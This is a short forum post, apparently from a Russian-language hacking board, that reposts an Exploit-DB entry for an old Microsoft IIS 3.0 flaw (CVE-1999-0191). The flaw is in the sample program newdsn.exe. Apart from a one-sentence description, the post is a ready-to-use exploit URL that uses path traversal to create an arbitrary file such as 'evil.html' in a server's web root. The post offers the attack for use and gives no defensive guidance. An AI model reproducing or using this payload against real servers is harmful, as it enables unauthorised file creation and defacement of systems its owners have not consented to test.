Exploit Microsoft IIS 3.0 - 'newdsn.exe' File Creation

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
20309
Проверка EDB
  1. Пройдено
Автор
VYTIS FEDARAVICIUS
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-1999-0191
Дата публикации
1997-08-25
Код:
source: https://www.securityfocus.com/bid/1818/info

Microsoft IIS 3.0 came with a sample program, newdsn.exe, installed by default in the directory wwwroot/scripts/tools/. Execution of this program with a properly submitted URL could allow for remote file creation. The file created is a Microsoft Access Database, but can have any extension, including .html.

http://vulnerable.site.comtools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil.html&newdb=CREATE_DB
 
Источник
www.exploit-db.com

Похожие темы